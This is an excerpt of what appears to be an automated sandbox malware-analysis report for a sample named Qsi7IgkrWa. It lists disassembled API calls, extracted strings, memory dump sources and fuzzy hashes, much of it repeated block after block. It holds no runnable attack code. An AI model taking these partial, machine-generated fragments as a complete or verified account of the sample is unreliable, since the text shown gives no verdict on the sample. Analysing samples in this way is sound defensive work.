                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 3fec27401659cc0925d0d343c5e433e8cd2a1cad7c5e1dca9c0065460ccba5cf
                                        • Instruction ID: 2282fc7e24d78f14aa1781351a26dda6358545370537cd90fac57344c96ed0b3
                                        • Opcode Fuzzy Hash: 3fec27401659cc0925d0d343c5e433e8cd2a1cad7c5e1dca9c0065460ccba5cf
                                        • Instruction Fuzzy Hash: 2EA011C22AA282FC300822022C02E3B0A8CC0C2F2033088AEF82280080B8808C020830
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00BCE51F
                                          • Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
                                          • Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 54b7c30ab9f09bc1ed21beecd55f997512750afd576712f7c8c9cb7f1bc7ad26
                                        • Instruction ID: 2282fc7e24d78f14aa1781351a26dda6358545370537cd90fac57344c96ed0b3
                                        • Opcode Fuzzy Hash: 54b7c30ab9f09bc1ed21beecd55f997512750afd576712f7c8c9cb7f1bc7ad26
                                        • Instruction Fuzzy Hash: 2EA011C22AA282FC300822022C02E3B0A8CC0C2F2033088AEF82280080B8808C020830
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00BCE51F
                                          • Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
                                          • Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 55a07f84f2e123a6b0b4720e92c6ced8dfe67980e10b956cedef64cf9cca350c
                                        • Instruction ID: 2282fc7e24d78f14aa1781351a26dda6358545370537cd90fac57344c96ed0b3
                                        • Opcode Fuzzy Hash: 55a07f84f2e123a6b0b4720e92c6ced8dfe67980e10b956cedef64cf9cca350c
                                        • Instruction Fuzzy Hash: 2EA011C22AA282FC300822022C02E3B0A8CC0C2F2033088AEF82280080B8808C020830
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00BCE51F
                                          • Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
                                          • Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: ddcfd5aa2004b337583b124f87f652856b32205ba94ad68e7bf6abdf37cc08a7
                                        • Instruction ID: 2282fc7e24d78f14aa1781351a26dda6358545370537cd90fac57344c96ed0b3
                                        • Opcode Fuzzy Hash: ddcfd5aa2004b337583b124f87f652856b32205ba94ad68e7bf6abdf37cc08a7
                                        • Instruction Fuzzy Hash: 2EA011C22AA282FC300822022C02E3B0A8CC0C2F2033088AEF82280080B8808C020830
                                        APIs
                                        • SetEndOfFile.KERNELBASE(?,00BB903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00BB9F0C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: File
                                        • String ID:
                                        • API String ID: 749574446-0
                                        • Opcode ID: 7778dc24692b2ad22e434f7d4b5b1eb14ac20eddae43b45d8fcd3185cb7ef385
                                        • Instruction ID: d86ba2da699503c87e76928a18f7777c96552a61b8dd004b60d54ec9b3a9a1d5
                                        • Opcode Fuzzy Hash: 7778dc24692b2ad22e434f7d4b5b1eb14ac20eddae43b45d8fcd3185cb7ef385
                                        • Instruction Fuzzy Hash: 29A0113008000A8ACE202B30CA0820C3B20EB20BC030002E8A00ACF0A2CB228A0B8A00
                                        APIs
                                        • SetCurrentDirectoryW.KERNELBASE(?,00BCAE72,C:\Users\user\Desktop,00000000,00BF946A,00000006), ref: 00BCAC08
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: CurrentDirectory
                                        • String ID:
                                        • API String ID: 1611563598-0
                                        • Opcode ID: 9bd5921e8c43a9882bb87f4b58e6e25ea37c07c9d11515882d094a506442e985
                                        • Instruction ID: 4df2596af4ffabc268468036a6905a3c56346496aba572871a179476a195a34c
                                        • Opcode Fuzzy Hash: 9bd5921e8c43a9882bb87f4b58e6e25ea37c07c9d11515882d094a506442e985
                                        • Instruction Fuzzy Hash: 62A012301001408782000B318F4950E76956F51B01F01C038600085030CB30C820A501
                                        APIs
                                        • CloseHandle.KERNELBASE(000000FF,?,?,00BB95D6,?,?,?,?,?,00BE2641,000000FF), ref: 00BB963B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: 5be099b2bbb3c1f27cc6943887866e9cd87f01273dece9583321e21d0bdbb6c8
                                        • Instruction ID: 93b8fc8cf9fd283b0909592f643e67aae87788b72a458980b4c5849afb035a01
                                        • Opcode Fuzzy Hash: 5be099b2bbb3c1f27cc6943887866e9cd87f01273dece9583321e21d0bdbb6c8
                                        • Instruction Fuzzy Hash: D8F08971481B559FDB308E35C458BF277E8EB12321F041F9ED1E743AE0D7A1A98D8A40
                                        APIs
                                          • Part of subcall function 00BB1316: GetDlgItem.USER32(00000000,00003021), ref: 00BB135A
                                          • Part of subcall function 00BB1316: SetWindowTextW.USER32(00000000,00BE35F4), ref: 00BB1370
                                        • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00BCC2B1
                                        • EndDialog.USER32(?,00000006), ref: 00BCC2C4
                                        • GetDlgItem.USER32(?,0000006C), ref: 00BCC2E0
                                        • SetFocus.USER32(00000000), ref: 00BCC2E7
                                        • SetDlgItemTextW.USER32(?,00000065,?), ref: 00BCC321
                                        • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00BCC358
                                        • FindFirstFileW.KERNEL32(?,?), ref: 00BCC36E
                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00BCC38C
                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00BCC39C
                                        • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00BCC3B8
                                        • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00BCC3D4
                                        • _swprintf.LIBCMT ref: 00BCC404
                                          • Part of subcall function 00BB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BB40A5
                                        • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00BCC417
                                        • FindClose.KERNEL32(00000000), ref: 00BCC41E
                                        • _swprintf.LIBCMT ref: 00BCC477
                                        • SetDlgItemTextW.USER32(?,00000068,?), ref: 00BCC48A
                                        • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00BCC4A7
                                        • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00BCC4C7
                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00BCC4D7
                                        • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00BCC4F1
                                        • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00BCC509
                                        • _swprintf.LIBCMT ref: 00BCC535
                                        • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00BCC548
                                        • _swprintf.LIBCMT ref: 00BCC59C
                                        • SetDlgItemTextW.USER32(?,00000069,?), ref: 00BCC5AF
                                          • Part of subcall function 00BCAF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00BCAF35
                                          • Part of subcall function 00BCAF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00BEE72C,?,?), ref: 00BCAF84
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                        • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                        • API String ID: 797121971-1840816070
                                        • Opcode ID: 1dadfe54f4bc81791ed740f7f83c60ad35fc303a8c62bde8f4e56dc4cd5919ee
                                        • Instruction ID: 6ec3a5999ca48fb2e9775c9727ae1393c1c8d31a06a9de9158e9e4f80a366ae5
                                        • Opcode Fuzzy Hash: 1dadfe54f4bc81791ed740f7f83c60ad35fc303a8c62bde8f4e56dc4cd5919ee
                                        • Instruction Fuzzy Hash: B4918472248384BBD2219BA0CC89FFF7BECEB5AB04F40485DF649D6091D771A6048762
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00BB6FAA
                                        • _wcslen.LIBCMT ref: 00BB7013
                                        • _wcslen.LIBCMT ref: 00BB7084
                                          • Part of subcall function 00BB7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00BB7AAB
                                          • Part of subcall function 00BB7A9C: GetLastError.KERNEL32 ref: 00BB7AF1
                                          • Part of subcall function 00BB7A9C: CloseHandle.KERNEL32(?), ref: 00BB7B00
                                          • Part of subcall function 00BBA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00BB977F,?,?,00BB95CF,?,?,?,?,?,00BE2641,000000FF), ref: 00BBA1F1
                                          • Part of subcall function 00BBA1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00BB977F,?,?,00BB95CF,?,?,?,?,?,00BE2641), ref: 00BBA21F
                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00BB7139
                                        • CloseHandle.KERNEL32(00000000), ref: 00BB7155
                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00BB7298
                                          • Part of subcall function 00BB9DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00BB73BC,?,?,?,00000000), ref: 00BB9DBC
                                          • Part of subcall function 00BB9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00BB9E70
                                          • Part of subcall function 00BB9620: CloseHandle.KERNELBASE(000000FF,?,?,00BB95D6,?,?,?,?,?,00BE2641,000000FF), ref: 00BB963B
                                          • Part of subcall function 00BBA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00BBA325,?,?,?,00BBA175,?,00000001,00000000,?,?), ref: 00BBA501
                                          • Part of subcall function 00BBA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00BBA325,?,?,?,00BBA175,?,00000001,00000000,?,?), ref: 00BBA532
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                        • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                        • API String ID: 3983180755-3508440684
                                        • Opcode ID: 10041b6b72f25e91cb2db61f8093891b150174cddfdf0d3ab3090927d0eea0d8
                                        • Instruction ID: 5a2911708497375a54e08d075364d583ee8bc9ccd7e61db2af6f78d3a59e7edc
                                        • Opcode Fuzzy Hash: 10041b6b72f25e91cb2db61f8093891b150174cddfdf0d3ab3090927d0eea0d8
                                        • Instruction Fuzzy Hash: 2BC1D371944644ABDB25EB74CC85FFEB3E8EF44300F0045DAF956E7282DBB4AA448B61
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: __floor_pentium4
                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                        • API String ID: 4168288129-2761157908
                                        • Opcode ID: b3a81deb0cddb968428518d6bf84b951ca35fd9f2175d0ebbb613bbeaec2120d
                                        • Instruction ID: 9f765d4e2513a8df1bb04579bda33074397710b60539b99017eeb3d8b7d60a3a
                                        • Opcode Fuzzy Hash: b3a81deb0cddb968428518d6bf84b951ca35fd9f2175d0ebbb613bbeaec2120d
                                        • Instruction Fuzzy Hash: 0EC22671E086298BDB25DE289D807EAB7F5EB44304F1541EBD45EEB340E779AE818F40
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: H_prolog_swprintf
                                        • String ID: CMT$h%u$hc%u
                                        • API String ID: 146138363-3282847064
                                        • Opcode ID: 8b3828cb597790f983532d410a2945f6f6d16455bb970399062feae3c615e399
                                        • Instruction ID: 179562ffa577931f1daf26a45036b8186ba2d63beed2ad168d9c8a867660aa14
                                        • Opcode Fuzzy Hash: 8b3828cb597790f983532d410a2945f6f6d16455bb970399062feae3c615e399
                                        • Instruction Fuzzy Hash: E532B371514284AFDB14DF74C895AF93BE5EF15700F0804BDFD8A8B286DBB49A49CB60
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00BB2874
                                        • _strlen.LIBCMT ref: 00BB2E3F
                                          • Part of subcall function 00BC02BA: __EH_prolog.LIBCMT ref: 00BC02BF
                                          • Part of subcall function 00BC1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00BBBAE9,00000000,?,?,?,0001044E), ref: 00BC1BA0
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BB2F91
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                        • String ID: CMT
                                        • API String ID: 1206968400-2756464174
                                        • Opcode ID: fa1212ea3f4d3157ecd9e4d202c018b994ff39344c5fbdbf41af3a61eb298b9f
                                        • Instruction ID: eaaeb5b3ea574aac1c9fddb51cd7485bda37e7162fd8980814cc518d1ae9a89b
                                        • Opcode Fuzzy Hash: fa1212ea3f4d3157ecd9e4d202c018b994ff39344c5fbdbf41af3a61eb298b9f
                                        • Instruction Fuzzy Hash: 5C62E8715002458FDB29DF38C8967FA7BE1EF55300F0845BEEC9A8B282DBB59945CB60
                                        APIs
                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00BCF844
                                        • IsDebuggerPresent.KERNEL32 ref: 00BCF910
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00BCF930
                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 00BCF93A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                        • String ID:
                                        • API String ID: 254469556-0
                                        • Opcode ID: 10f2045d59b4dc40fbfe2853a6b8ae194de64ad5e52773e0f01dd21a0e690996
                                        • Instruction ID: 0527d0468310fb22e76d15dec0ac911154d51cc1182b910afdb76de3cc9dc412
                                        • Opcode Fuzzy Hash: 10f2045d59b4dc40fbfe2853a6b8ae194de64ad5e52773e0f01dd21a0e690996
